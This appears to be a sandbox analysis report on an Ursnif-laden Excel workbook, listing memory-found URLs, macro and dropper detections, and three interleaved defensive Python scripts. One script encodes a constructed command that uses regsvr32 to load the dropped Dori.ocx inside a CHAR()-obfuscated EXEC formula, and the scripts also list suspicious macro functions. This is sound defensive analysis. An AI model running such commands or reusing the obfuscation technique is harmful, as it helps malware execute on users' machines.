            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.local
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://management.azure.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://management.azure.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://messaging.office.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ncus-000.contentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officeapps.live.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: Dori.ocx.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://settings.outlook.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://tasks.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://www.odwebp.svc.ms

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif

            E-Banking Fraud:

            Yara detected Ursnif

            System Summary:

            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4 | Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click
            Source: Screenshot number: 4 | Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
            Found Excel 4.0 Macro with suspicious formulas
            Source: InformazioneGenerale.xlsb | Initial sample: EXEC
            Found abnormal large hidden Excel 4.0 Macro sheet
            Source: InformazioneGenerale.xlsb | Initial sample: Sheet size: 583568
            Found obfuscated Excel 4.0 Macro
            Source: InformazioneGenerale.xlsb | Initial sample: High usage of CHAR() function: 97
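The two static indicators above (an EXEC formula and dense CHAR() usage) are the classic signs of an Excel 4.0 macro that builds its command line one character at a time. The script below is an added example of how to reproduce that triage and recover the hidden string; it is not the sandbox's logic and not the macro from InformazioneGenerale.xlsb. The formulas it runs on are constructed, and the command they decode to (regsvr32 loading the dropped .ocx) is an assumption chosen to match the report's artefacts, not a recovered payload.

```python
"""Static triage of Excel 4.0 (XLM) macro formulas: CHAR() obfuscation and EXEC.

Added example. The formulas below are CONSTRUCTED to mimic the two indicators
the report lists (an EXEC call and dense CHAR() usage); they are not the macro
recovered from InformazioneGenerale.xlsb, and the command line they decode to
is an assumption chosen for illustration.
"""
import re

# XLM functions that let a macro sheet run code or reach outside the workbook.
SUSPICIOUS_FUNCS = {"EXEC", "CALL", "REGISTER", "RUN", "FORMULA", "FORMULA.FILL"}

CHAR_RE = re.compile(r"CHAR\((\d+)\)")
# One or more CHAR(n) calls joined with '&', the usual way XLM hides strings.
CHAR_RUN_RE = re.compile(r"CHAR\(\d+\)(?:\s*&\s*CHAR\(\d+\))*")


def decode_char_runs(formula: str) -> str:
    """Replace every CHAR(n)&CHAR(m)... run with the quoted string it builds."""
    def _join(match: re.Match) -> str:
        codes = CHAR_RE.findall(match.group(0))
        return '"' + "".join(chr(int(c)) for c in codes) + '"'
    return CHAR_RUN_RE.sub(_join, formula)


def triage_formulas(formulas):
    """Return (total CHAR() calls, suspicious functions seen, decoded formulas)."""
    char_count = 0
    found = set()
    decoded = []
    for formula in formulas:
        char_count += len(CHAR_RE.findall(formula))
        plain = decode_char_runs(formula)
        decoded.append(plain)
        for name in SUSPICIOUS_FUNCS:
            # Match the name only where it is actually called, e.g. EXEC( but not FORMULA.FILL(
            if re.search(r"(?<![\w.])" + re.escape(name) + r"\(", plain):
                found.add(name)
    return char_count, found, decoded


def verdict(formulas, char_threshold: int = 20):
    """Reasons this sheet looks malicious; an empty list means nothing was found."""
    char_count, found, _ = triage_formulas(formulas)
    reasons = []
    if found:
        reasons.append("suspicious functions: " + ", ".join(sorted(found)))
    if char_count >= char_threshold:
        reasons.append(f"high usage of CHAR() function: {char_count}")
    return reasons


def build_char_formula(text: str) -> str:
    """Used only to construct the sample: encode text as CHAR(n)&CHAR(m)&..."""
    return "&".join(f"CHAR({ord(ch)})" for ch in text)


# CONSTRUCTED sample sheet. The command is an assumption, not the real payload.
SAMPLE_FORMULAS = [
    "=EXEC(" + build_char_formula("regsvr32 /s C:\\ProgramData\\Dori.ocx") + ")",
    "=HALT()",
]

if __name__ == "__main__":
    for line in triage_formulas(SAMPLE_FORMULAS)[2]:
        print(line)
    print(verdict(SAMPLE_FORMULAS))
```

To use it on a real workbook, feed it the formula text of every cell in the hidden macro sheet (for example, the output of oletools' olevba in XLM mode); the CHAR() count threshold is a tuning knob, and the decoded formulas are what you would paste into the report as the recovered command line.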
            Office process drops PE file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\10.11nov322[1].gif
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\Dori.ocx
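Both files Excel wrote here are PE images, yet one of them carries a .gif extension (the report's "wrong headers with respect to MIME Content-Type" and "non-matching file extension" signatures describe the same thing). The check below is an added example, not the sandbox's detector: it compares the magic bytes of a dropped file against what its extension promises. The file contents are constructed (a minimal MZ/PE header stub and a GIF89a signature); only the paths are taken from the report.

```python
"""Does a dropped file's content match its extension? (PE hidden under .gif)

Added example, not from the sandbox report. The file contents are CONSTRUCTED:
a minimal MZ/PE header stub stands in for the executable the sandbox saw Excel
write, and a GIF89a signature stands in for a benign image. Only magic bytes
are inspected, so this is a triage filter, not a PE parser.
"""
import ntpath
import struct

# Extensions under which a PE payload would not be surprising.
PE_EXTENSIONS = {".exe", ".dll", ".ocx", ".scr", ".sys", ".cpl", ".drv"}

# (signature, type) for a few common formats; PE is detected separately.
MAGIC = [
    (b"GIF87a", "gif"), (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"), (b"%PDF", "pdf"), (b"PK\x03\x04", "zip"),
]
EXPECTED_EXT = {
    "pe": PE_EXTENSIONS, "gif": {".gif"}, "png": {".png"},
    "pdf": {".pdf"}, "zip": {".zip", ".docx", ".xlsx", ".pptx", ".jar"},
}


def is_pe(data: bytes) -> bool:
    """MZ header whose e_lfanew (offset 0x3C) points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff_type(data: bytes) -> str:
    """Best-effort content type from the leading bytes."""
    if is_pe(data):
        return "pe"
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    return "unknown"


def check_drop(path: str, data: bytes) -> dict:
    """Classify one dropped file; 'mismatch' is True when content and extension disagree."""
    ext = ntpath.splitext(path)[1].lower()
    kind = sniff_type(data)
    mismatch = kind != "unknown" and ext not in EXPECTED_EXT[kind]
    return {"path": path, "ext": ext, "kind": kind, "mismatch": mismatch}


def suspicious_drops(drops: dict) -> list:
    """Paths whose content does not match their extension, in input order."""
    return [p for p, d in drops.items() if check_drop(p, d)["mismatch"]]


def make_pe_stub() -> bytes:
    """CONSTRUCTED: the smallest byte string that passes is_pe (not a loadable image)."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)          # e_lfanew -> right after the DOS header
    return bytes(hdr) + b"PE\x00\x00" + b"\x4c\x01"  # IMAGE_FILE_MACHINE_I386


# CONSTRUCTED contents under the paths from the report, plus one benign control file.
DROPPED_FILES = {
    r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\10.11nov322[1].gif": make_pe_stub(),
    r"C:\ProgramData\Dori.ocx": make_pe_stub(),
    r"C:\Users\user\Pictures\logo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
}

if __name__ == "__main__":
    for path, data in DROPPED_FILES.items():
        print(check_drop(path, data))
    print(suspicious_drops(DROPPED_FILES))
```

Note the limit of this check: Dori.ocx passes it, because an OCX is a PE by definition. What makes that file notable in the report is the writer (EXCEL.EXE) and the location (C:\ProgramData), so pair content sniffing with a parent-process rule such as "Office binary creates a PE anywhere" rather than relying on extension mismatches alone.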
            Writes or reads registry keys via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
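Registry writes issued through WMI's StdRegProv class are worth a dedicated rule: the actual RegSetValue call is executed by the WMI provider host (WmiPrvSE.exe) on the caller's behalf, so telemetry keyed on the writing process attributes the change to WmiPrvSE, and user-mode hooks on the registry API inside regsvr32.exe never see it. The sandbox restores attribution by logging the IWbemServices::ExecMethod call itself, as the entries above show. The script below is an added example of the same correlation over log lines shaped like those entries; it is not the sandbox's code. The log lines are constructed, and the allowlist of processes for which StdRegProv writes are routine is an assumption.

```python
"""Spot registry writes that go through WMI's StdRegProv instead of the registry API.

Added example, not the report's tooling. The log lines are CONSTRUCTED in the
same shape as the report's 'WMI Queries' entries; the allowlist of processes
expected to drive StdRegProv is an assumption for illustration.
"""
import ntpath
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<proc>.+?) WMI Queries: IWbemServices::ExecMethod - "
    r"(?P<namespace>\S+) : StdRegProv::(?P<method>\w+)$"
)

# StdRegProv methods that change the registry; everything else is a read or enumerate.
WRITE_METHODS = {
    "CreateKey", "DeleteKey", "DeleteValue", "SetBinaryValue", "SetDWORDValue",
    "SetQWORDValue", "SetExpandedStringValue", "SetMultiStringValue", "SetStringValue",
    "SetSecurityDescriptor",
}

# ASSUMPTION: processes for which StdRegProv writes are routine in this environment.
EXPECTED_WMI_WRITERS = {"wmiprvse.exe", "powershell.exe", "msiexec.exe"}


def parse_wmi_line(line: str):
    """Return {'proc', 'namespace', 'method', 'is_write'} or None for non-StdRegProv lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["proc"] = ntpath.basename(rec["proc"]).lower()
    rec["is_write"] = rec["method"] in WRITE_METHODS
    return rec


def summarize(lines):
    """Per-process counts of StdRegProv reads and writes plus the methods used."""
    summary = defaultdict(lambda: {"reads": 0, "writes": 0, "methods": set()})
    for line in lines:
        rec = parse_wmi_line(line)
        if rec is None:
            continue
        entry = summary[rec["proc"]]
        entry["writes" if rec["is_write"] else "reads"] += 1
        entry["methods"].add(rec["method"])
    return dict(summary)


def unexpected_writers(lines):
    """Processes that write the registry via WMI but are not on the allowlist."""
    return sorted(
        proc for proc, entry in summarize(lines).items()
        if entry["writes"] and proc not in EXPECTED_WMI_WRITERS
    )


# CONSTRUCTED log, modelled on the report's entries plus one allowlisted control line.
SAMPLE_LINES = [
    r"C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue",
    r"C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue",
    r"C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue",
    r"C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue",
    "noise line that is not a WMI query",
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LINES))
    print(unexpected_writers(SAMPLE_LINES))
```

In production the same logic sits on top of the Microsoft-Windows-WMI-Activity operational log or an EDR's WMI telemetry rather than sandbox text, and regsvr32.exe is a good candidate for the "unexpected" list: COM registration uses the registry API directly, so a regsvr32 that talks to StdRegProv is running code other than the DLL it was asked to register.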
            Writes registry values via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue